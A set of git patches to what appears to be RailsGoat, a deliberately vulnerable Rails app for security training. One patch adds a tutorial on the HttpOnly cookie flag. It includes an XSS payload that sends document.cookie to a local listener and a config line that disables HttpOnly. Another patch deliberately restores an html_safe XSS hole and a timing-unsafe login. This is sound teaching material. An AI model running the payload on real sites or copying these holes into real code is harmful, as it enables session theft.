From a2d487cbf256b46d566b897a59ceefa2ef956712 Mon Sep 17 00:00:00 2001 From: Al Snow Date: Tue, 9 Sep 2014 12:59:21 -0400 Subject: [PATCH 1/5] Upgraded libv8 gem --- Gemfile.lock | 2 +- 1 file changed, 1 insertion(+), 1 deletion(-) diff --git a/Gemfile.lock b/Gemfile.lock index b464d0b..667fcf5 100644 --- a/Gemfile.lock +++ b/Gemfile.lock @@ -144,7 +144,7 @@ GEM kgio (2.9.2) launchy (2.4.2) addressable (~> 2.3) - libv8 (3.16.14.3) + libv8 (3.16.14.5) listen (2.7.9) celluloid (>= 0.15.2) rb-fsevent (>= 0.9.3) From ef2bc20c970528aefca623ab698c6efb47698bc5 Mon Sep 17 00:00:00 2001 From: cktricky Date: Thu, 11 Sep 2014 11:01:56 -0400 Subject: [PATCH 2/5] working on the httponly tutorial --- app/models/user.rb | 4 +- app/views/layouts/shared/_header.html.erb | 2 +- .../broken_auth_sess/_httponly_flag.html.erb | 75 +++++++++++++++++++ .../_insecure_compare.html.erb | 2 +- app/views/tutorials/broken_auth.html.erb | 5 ++ 5 files changed, 84 insertions(+), 4 deletions(-) create mode 100644 app/views/layouts/tutorial/broken_auth_sess/_httponly_flag.html.erb diff --git a/app/models/user.rb b/app/models/user.rb index 9c5cc7f..23922eb 100755 --- a/app/models/user.rb +++ b/app/models/user.rb @@ -62,7 +62,7 @@ class User < ActiveRecord::Base return auth end -=begin +#=begin # More secure version, still lacking a decent hashing routine, this is for timing attack prevention def self.authenticate(email, password) user = find_by_email(email) || User.new(:password => "") @@ -72,7 +72,7 @@ class User < ActiveRecord::Base raise "Incorrect username or password" end end -=end +#=end def assign_user_id unless @skip_user_id_assign.present? || self.user_id.present? diff --git a/app/views/layouts/shared/_header.html.erb b/app/views/layouts/shared/_header.html.erb index 0be9691..b2ee16d 100755 --- a/app/views/layouts/shared/_header.html.erb +++ b/app/views/layouts/shared/_header.html.erb @@ -26,7 +26,7 @@ going on with funny chars and jquery, plus it says safe so I'm guessing nothing bad will happen --> - Welcome, <%= current_user.first_name.html_safe %> + Welcome, <%= current_user.first_name %>
  • <%= button_to "RailsGoat Tutorials", tutorials_path, {:class => "btn btn-primary", :method => "get"}%> diff --git a/app/views/layouts/tutorial/broken_auth_sess/_httponly_flag.html.erb b/app/views/layouts/tutorial/broken_auth_sess/_httponly_flag.html.erb new file mode 100644 index 0000000..52a13a5 --- /dev/null +++ b/app/views/layouts/tutorial/broken_auth_sess/_httponly_flag.html.erb @@ -0,0 +1,75 @@ +
    +
    +
    + A2 - Broken Authentication and Session Management - Lack of HttpOnly Flag +
    +
    +
    +
    +
    +
    + + + + Description + +
    +
    +
    + INSERT DESC +
    +
    +
    +
    +
    + + + + Bug + +
    +
    +
    +

    + By default, Ruby on Rails protects it's cookies with the HttpOnly flag. However, it is possible to disable this security protection and is not recommended. You can disable this protection using the flag highlighted below. This is an insecure and unnecessary change. +

    + 
    +Railsgoat::Application.config.session_store :cookie_store, key: '_railsgoat_session', httponly: false
+
    +
    +
    +
    +
    +
    + + + + Solution + +
    +
    +
    +

    Lack of Password Complexity - SOLUTION

    + INSERT SOLUTION +
    +
    +
    +
    +
    + + + + Hint + +
    +
    +
    +

    + INSERT DESC +

    +
    +
    +
    +
    +
    +
    diff --git a/app/views/layouts/tutorial/broken_auth_sess/_insecure_compare.html.erb b/app/views/layouts/tutorial/broken_auth_sess/_insecure_compare.html.erb index 98cc566..de35813 100644 --- a/app/views/layouts/tutorial/broken_auth_sess/_insecure_compare.html.erb +++ b/app/views/layouts/tutorial/broken_auth_sess/_insecure_compare.html.erb @@ -67,7 +67,7 @@
    -

    Lack of Password Complexity - SOLUTION

    +

    Insecure Timing Attacks - SOLUTION

    Within app/models/user.rb:

    diff --git a/app/views/tutorials/broken_auth.html.erb b/app/views/tutorials/broken_auth.html.erb index 4953d5b..4b9056c 100755 --- a/app/views/tutorials/broken_auth.html.erb +++ b/app/views/tutorials/broken_auth.html.erb @@ -15,6 +15,11 @@ <%= render :partial => ("layouts/tutorial/broken_auth_sess/insecure_compare")%>
    +
    +
    + <%= render :partial => ("layouts/tutorial/broken_auth_sess/httponly_flag")%> +
    +
    From a50cad0cf395d0fd788cb214f2af5a4a8f2db8de Mon Sep 17 00:00:00 2001 From: cktricky Date: Thu, 11 Sep 2014 11:11:55 -0400 Subject: [PATCH 3/5] Resolves #133 --- .../broken_auth_sess/_httponly_flag.html.erb | 28 +++++++++++++++---- 1 file changed, 23 insertions(+), 5 deletions(-) diff --git a/app/views/layouts/tutorial/broken_auth_sess/_httponly_flag.html.erb b/app/views/layouts/tutorial/broken_auth_sess/_httponly_flag.html.erb index 52a13a5..498a0c6 100644 --- a/app/views/layouts/tutorial/broken_auth_sess/_httponly_flag.html.erb +++ b/app/views/layouts/tutorial/broken_auth_sess/_httponly_flag.html.erb @@ -16,7 +16,7 @@
    - INSERT DESC + The HttpOnly flag prevents access to the document.cookie attribute of the DOM via JavaScript. Helpful for limiting the impact of Cross-Site Scripting as it relates to session theft.
    @@ -31,7 +31,7 @@

    - By default, Ruby on Rails protects it's cookies with the HttpOnly flag. However, it is possible to disable this security protection and is not recommended. You can disable this protection using the flag highlighted below. This is an insecure and unnecessary change. + By default, Ruby on Rails protects its' cookies with the HttpOnly flag. However, it is possible to disable this security protection and is not recommended. You can disable this protection using the flag highlighted below. This is an insecure and unnecessary change. 

     Railsgoat::Application.config.session_store :cookie_store, key: '_railsgoat_session', httponly: false
@@ -49,8 +49,26 @@ Railsgoat::Application.config.session_store :cookie_store, key: '_railsgoat_sess
    -

    Lack of Password Complexity - SOLUTION

    - INSERT SOLUTION +

    Lack of the HttpOnly Flag - ATTACK

    +

    + Navigate to the sign-up page, sign up as a user, but in the first name field, enter: + 

    +					<script>document.location="http://localhost:8000/" + document.cookie </script>
+
    +

    + Additionally, fire up Python's SimpleHTTPServer module using the following command: +

    + 
    +					$ python -m SimpleHTTPServer
+
    +

    + Now authenticate to the application as the user you just created, you'll be redirected, now review the terminal tab that has the python server running. You'll notice that you see a GET request with the user's session in the request path. This means you have now grabbed the user's session via Cross-Site Scripting. +

    +

    +

    Lack of the HttpOnly Flag - SOLUTION

    +

    + Keep the default configuration "as-is" and do not make this change. If this exists in your code base, remove it. +

    @@ -65,7 +83,7 @@ Railsgoat::Application.config.session_store :cookie_store, key: '_railsgoat_sess

    - INSERT DESC + Can JavaScript interact with my session cookie?

    From 7e38ac845f72c367c5cada1e7565719291707056 Mon Sep 17 00:00:00 2001 From: cktricky Date: Thu, 11 Sep 2014 11:13:15 -0400 Subject: [PATCH 4/5] oops, omitted a couple important features/vulnerabilities --- app/models/user.rb | 4 ++-- app/views/layouts/shared/_header.html.erb | 2 +- 2 files changed, 3 insertions(+), 3 deletions(-) diff --git a/app/models/user.rb b/app/models/user.rb index 23922eb..9c5cc7f 100755 --- a/app/models/user.rb +++ b/app/models/user.rb @@ -62,7 +62,7 @@ class User < ActiveRecord::Base return auth end -#=begin +=begin # More secure version, still lacking a decent hashing routine, this is for timing attack prevention def self.authenticate(email, password) user = find_by_email(email) || User.new(:password => "") @@ -72,7 +72,7 @@ class User < ActiveRecord::Base raise "Incorrect username or password" end end -#=end +=end def assign_user_id unless @skip_user_id_assign.present? || self.user_id.present? diff --git a/app/views/layouts/shared/_header.html.erb b/app/views/layouts/shared/_header.html.erb index b2ee16d..0be9691 100755 --- a/app/views/layouts/shared/_header.html.erb +++ b/app/views/layouts/shared/_header.html.erb @@ -26,7 +26,7 @@ going on with funny chars and jquery, plus it says safe so I'm guessing nothing bad will happen --> - Welcome, <%= current_user.first_name %> + Welcome, <%= current_user.first_name.html_safe %>
  • <%= button_to "RailsGoat Tutorials", tutorials_path, {:class => "btn btn-primary", :method => "get"}%> From e78f9554943915ea29c9c3e90f174d6b12532ee8 Mon Sep 17 00:00:00 2001 From: Al Snow Date: Thu, 11 Sep 2014 19:17:32 -0400 Subject: [PATCH 5/5] Updated 1 gem by rebuilding Gemfile.lock file --- Gemfile.lock | 2 +- 1 file changed, 1 insertion(+), 1 deletion(-) diff --git a/Gemfile.lock b/Gemfile.lock index 667fcf5..f160d6b 100644 --- a/Gemfile.lock +++ b/Gemfile.lock @@ -276,7 +276,7 @@ GEM rack (>= 1.0.0) thor (0.19.1) tilt (1.4.1) - timers (4.0.0) + timers (4.0.1) hitimes travis-lint (2.0.0) json